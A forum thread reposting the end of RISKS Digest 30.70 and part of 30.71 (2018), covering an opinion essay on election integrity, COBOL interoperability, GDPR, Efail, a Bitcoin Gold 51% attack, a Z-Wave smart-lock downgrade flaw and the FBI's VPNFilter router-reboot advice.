    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me to trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something, In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
    ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
    COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're suppose to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPPA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. Medical insurance industry should take note enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
  5. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    Joined:
    Apr 3, 2007
    Messages:
    4,340
    Likes Received:
    300
    Trophy Points:
    258
    Location:
    Tampa
    Ratings Received:
    +2,180
    Risks Digest 30.71

    RISKS List Owner

    Jun 5, 2018 3:56 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 5 May 2018 Volume 30 : Issue 71

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Microsoft to acquire GitHub for $7.5 billion (Lauren Weinstein)
    Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)
    Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)
    Google to remove "secure" indicator from HTTPS pages on Chrome (Keith Medcalf,
    (Gene Wirchenko, John Levine)
    "How your web browser tells you when it's safe" (Gregg Keizer)
    "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)
    FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)
    Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)
    How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)
    Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)
    YouTube stars' fury over algorithm tests (BBC.com)
    Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later (Fortune)
    Amazon's Echo privacy flub has big implications for IT (Evan Schuman)
    "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)
    License Plate Risks (Jeremy Ardley)
    "Jira bug exposed private server keys at major companies, researcher finds"
    (Zack Whittaker)
    Google Started a Political Sh*tstorm Because of Its Over-Reliance on
    Wikipedia (Motherboard)
    Signs of sophisticated cellphone spying found near White House, U.S.
    officials say (WaPo)
    Massive Visa Outage Shows the Fragility of Global Payments (WiReD)
    How can criminals manipulate cryptocurrency markets?
    (The Conversation)
    Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds of User
    Email Addresses (Gizmodo)
    Commentary: GDPR Misses the Point (Fortune)
    GDPR, Privacy, and CISSPforum vs "Community" (Rob Slade)
    German spy agency can keep tabs on Internet hubs: court (Phys)
    Trendism and cognitive stagnation (John Ohno)
    Re: Securing Elections (Amos Shapir)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Mon, 4 Jun 2018 10:34:09 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Microsoft to acquire GitHub for $7.5 billion

    via NNSquad
    Microsoft Corp. on Monday announced it has reached an agreement to acquire
    GitHub, the world's leading software development platform where more than
    28 million developers learn, share and collaborate to create the
    future. Together, the two companies will empower developers to achieve
    more at every stage of the development lifecycle, accelerate enterprise
    use of GitHub, and bring Microsoft's developer tools and services to new
    audiences.

    All GitHub users forthwith will be required to run Windows 10 or subsequent
    Microsoft operating systems with all privacy options disabled, manage their
    code only by voice via Cortana, and install the new Microsoft Clippy 2018!
    Microsoft Office Assistant on all of their devices. Microsoft will now scan
    all GitHub materials for patent infringement and turn violators over to
    local authorities for arrest.

    ------------------------------

    Date: Sun, 27 May 2018 14:40:13 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Bitcoin backlash as 'miners' suck up electricity, stress power grids
    in Central Washington (Seattle Times)

    NNSquad
    Bitcoin backlash as ‘miners’ suck up electricity, stress power grids in Central Washington

    But it's not simply the scale of requests that is perplexing utility
    staff. Many would-be miners have no understanding of how large power
    purchases work. In one case this winter, miners from China landed their
    private jet at the local airport, drove a rental car to the visitor center
    at the Rocky Reach Dam, just north of Wenatchee, and, according to Chelan
    County PUD officials, politely asked to see the "dam master because we
    want to buy some electricity." Bitcoin fever has created other,
    smaller-scale problems for the utility. Three times a week, on average,
    utility crews in Chelan County discover unpermitted home miners running
    computer servers far too large for the electrical grids of residential
    neighborhoods. In one instance last year, the transformer outside a
    bootleg miner's home overheated and touched off a grass fire, Chelan
    County PUD officials say.

    Just cut these cryptocurrency mining parasites off. Knock them off the
    grid. If they can generate their own power safely, fine. Otherwise, to hell
    with them.

    ------------------------------

    Date: May 26, 2018 at 8:10:52 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: Every cryptocurrency's nightmare scenario is happening to Bitcoin Gold
    (Joon Ian Wong)

    Joon Ian Wong, QZ, 24 May 2018
    Every cryptocurrency’s nightmare scenario is happening to Bitcoin Gold

    Bitcoin Gold is a fork, or spin-off, of the original cryptocurrency,
    bitcoin. It shares much of the same code and works in a similar way to
    bitcoin, with Bitcoin Gold miners contributing computational power to
    process new transactions. That also means it faces the same vulnerabilities
    as bitcoin, but without the protections that come from the large, dispersed
    group of people and organizations whose computers are powering the bitcoin
    blockchain.

    In recent days the nightmare scenario for any cryptocurrency is playing out
    for Bitcoin Gold, as an attacker has taken control of its blockchain and
    proceeded to defraud cryptocurrency exchanges. All the Bitcoin Gold in
    circulation is valued at $786 million, according to data provider
    Coinmarketcap. Blockchains are designed to be decentralized but when an
    individual or group acting in concert controls the majority of a
    blockchain's processing power, they can tamper with transactions and pave
    the way for fraud. This is known as a 51% attack.

    The possibility of a 51% attack has been one of the concerns institutions
    such as banks and tech companies have had over the years about using the
    blockchain for transactions; some have worried that the Chinese government
    could at some point endeavor to do that, ordering all of the Chinese bitcoin
    miners to act in concert. It's unlikely for bitcoin, but for smaller
    cryptocurrencies, 51% attacks are a concern, one dramatized on a recent
    episode of HBO's series Silicon Valley.

    Cryptocurrency miners commit their computer processing power--or hash
    power--to adding new transactions to a coin's blockchain. They are rewarded
    in units of the coin in return. The idea is that these incentives create
    competition among miners to add more hash power to the chain. The more hash
    power is added, the better the chances of winning a reward.

    So what's a 51% attack? It's when a single miner controls more than half of
    the hash power on a particular blockchain. When this happens, that miner can
    mess with transactions in a bunch of ways, including spending coins
    twice. This is the *double-spending problem*, a puzzle surrounding digital
    money that has vexed computer scientists for years -- and which was solved
    by bitcoin. But the solution only holds if no single miner controls the
    majority of the hash power on a chain.

    Bitcoin Gold has been experiencing double-spending attacks for at least a
    week, according to forum posts by Bitcoin Gold director of communications
    Edward Iskra. Someone has taken control of more than half of Bitcoin Gold's
    hash rate and is double-spending coins. Since an attacker must spend coins
    in his or her possession, and can't conjure up new coins, the attack is
    somewhat limited.

    What's happening now, according to Iskra, is that exchanges that
    automatically accept large deposits are being targeted. The fraudster
    deposits Bitcoin Gold into an account at an exchange, where coins are
    traded. Once the exchange credits the Bitcoin Gold to the attacker's
    account, the attacker trades those coins for another cryptocurrency and
    withdraws it. The attacker can repeatedly make deposits of the same Bitcoin
    Gold it deposited in the first exchange and profit in this way.

    A bunch of other cryptocurrencies have been attacked in similar ways
    recently. Something called Verge has been hit twice in the last two months,
    leading to $2.7 million being stolen. The exotic-sounding coins Monacoin and
    Electroneum have also suffered from 51% attacks not too long ago.

    ------------------------------

    Date: Sat, 26 May 2018 18:03:44 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome

    Google should be keelhauled for this (or at least the dolts who thought it
    up should be keelhauled, and the sailors doing the hauling should be given
    three toddy's of rum when the googlers' are half-way along the keel). HTTPS
    does not mean that the Web Site is secure. It means that it is transport
    encrypted. Similarly, that the web site is not using SSL/TLS does not mean
    it is unsecure -- it simply means that the transport is not encrypted.

    There is a *LOT* more to being *secure* that merely engaging transport
    security. It should be noted that Google will not detect "forged" or MITM
    certificates, and that as a result much of what they hold out as "secure"
    actually does not even have meaningful transport security.

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Google to remove `secure' indicator from HTTPS pages on Chrome
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: 28 May 2018 11:45:16 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome
    (ZDNet)

    Google previously announced that it would mark HTTP pages as "not
    secure" beginning with Chrome 68 in July.

    By October with Chrome 70, Google will start showing a red "not
    secure" warning when users enter data on HTTP pages. "Previously, HTTP
    usage was too high to mark all HTTP pages with a strong red warning,"
    Google said.

    ------------------------------

    Date: Sun, 27 May 2018 08:54:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "How your web browser tells you when it's safe" (Gregg Keizer)

    Gregg Keizer, Computerworld, 23 May 2018
    https://www.computerworld.com/artic...your-web-browser-tells-you-when-its-safe.html

    As Google moves to change how its Chrome browser flags insecure websites,
    rival browsers may be forced to follow suit. Here's how other browsers
    currently handle website security and what changes they have coming.

    selected text:

    Google last week spelled out the schedule it will use to reverse years of
    advice from security experts when browsing the Web - to "look for the
    padlock." Starting in July, the search giant will mark insecure URLs in its
    market-dominant Chrome, not those that already are secure. Google's goal?
    Pressure all website owners to adopt digital certificates and encrypt the
    traffic of all their pages.

    Security pros praised Google's campaign, and the probable end-game. "I
    won't have to tell my mom to look for the padlock," said Chester Wisniewski,
    principal research scientist at security firm Sophos, of the
    switcheroo. "She can just use her computer."

    [Let us change stuff for the people who do not know much about computers.
    That will make things simpler for them. These two sentences do not belong
    together.]

    But what are Chrome's rivals doing? Marching in step or sticking to
    tradition? Computerworld fired up the Big Four -- Chrome, Mozilla's Firefox,
    Apple's Safari and Microsoft's Edge -- to find out.

    ------------------------------

    Date: Sun, 27 May 2018 09:07:11 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)

    Liam Tung, ZDNet, 25 May 2018
    https://www.zdnet.com/article/smart...ets-attackers-open-your-door-from-yards-away/
    Up to 100 million Internet of Things devices could be at risk.

    starting text:

    Hackers may be able to remotely unlock your smart lock if it relies on the
    Z-Wave wireless protocol.

    According to researchers at UK firm Pen Test Partners, Z-Wave is vulnerable
    to an attack that forces the current secure pairing mechanism, known as S2,
    to an earlier version with known weaknesses, called S0.

    The problem with S0 is that when two devices, like a controller and a smart
    lock, are pairing, it encrypts the key exchange using a hardcoded key
    '0000000000000000'. So, an attacker could capture traffic on the network and
    easily decrypt it to discover the key.

    S2 fixed this problem by employing the Diffie-Hellman algorithm for securely
    sharing secret keys, but the downgrade removes that protection.

    The researchers have posted a video demonstrating the downgrade attack --
    dubbed Z-Shave -- on a Conexis L1 Smart Door Lock from lock manufacture
    Yale. They note that an attacker within about 100 meters could, after the
    downgrade attack, then steal the keys to the smart lock.

    Z-Wave chips are in 100 million smart gadgets, from lights to heating
    systems, but the risk is greater for things with security applications, such
    as locks.

    ------------------------------

    Date: May 27, 2018 at 9:56:50 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)

    Feds take aim at potent VPNFilter malware allegedly unleashed by Russia.
    Dan Goodin, Ars Technica, 25 May 2018

    http://arstechnica.com/information-...t-now-to-kill-malware-infecting-500k-devices/

    The FBI is advising users of consumer-grade routers and network-attached
    storage devices to reboot them as soon as possible to counter
    Russian-engineered malware that has infected hundreds of thousands devices.

    Researchers from Cisco's Talos security team first disclosed the
    existence of the malware on Wednesday. The detailed report said the malware
    infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP,
    and TP-Link. Known as VPNFilter, the malware allowed attackers to collect
    communications, launch attacks on others, and permanently destroy the
    devices with a single command. The report said the malware was developed by
    hackers working for an advanced nation, possibly Russia, and advised users
    of affected router models to perform a factory reset, or at a minimum to
    reboot. Later in the day, The Daily Beast reported that VPNFilter was indeed
    developed by a Russian hacking group, one known by a variety of names,
    including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also
    said the FBI had seized an Internet domain VPNFilter used as a backup means
    to deliver later stages of the malware to devices that were already infected
    with the initial stage 1. The seizure meant that the primary and secondary
    means to deliver stages 2 and 3 had been dismantled, leaving only a third
    fallback, which relied on attackers sending special packets to each infected
    device.

    Limited persistence

    The redundant mechanisms for delivering the later stages address a
    fundamental shortcoming in VPNFilter -- stages 2 and 3 can't survive a
    reboot, meaning they are wiped clean as soon as a device is
    restarted. Instead, only stage 1 remains. Presumably, once an infected
    device reboots, stage 1 will cause it to reach out to the recently seized
    ToKnowAll.com address. The FBI's advice to reboot small office and home
    office routers and NAS devices capitalizes on this limitation. In a
    statement published Friday, FBI officials suggested that users of all
    consumer-grade routers, not just those known to be vulnerable to VPNFilter,
    protect themselves. The officials wrote:

    The FBI recommends any owner of small office and home office routers rebo ot
    the devices to temporarily disrupt the malware and aid the potential
    identification of infected devices. Owners are advised to consider disabling
    remote management settings on devices and secure with strong passwords and
    encryption when enabled. Network devices should be upgraded to the latest
    available versions of firmware.

    In a statement also published Friday, Justice Department officials wrote:

    Owners of SOHO and NAS devices that may be infected should reboot their
    devices as soon as possible, temporarily eliminating the second stage
    malware and causing the first stage malware on their device to call out
    for instructions. Although devices will remain vulnerable to reinfection
    with the second stage malware while connected to the Internet, these
    efforts maximize opportunities to identify and remediate the infection
    worldwide in the time available before Sofacy actors learn of the
    vulnerability in their command-and-control infrastructure.

    The US Department of Homeland Security has also issued a statement advising
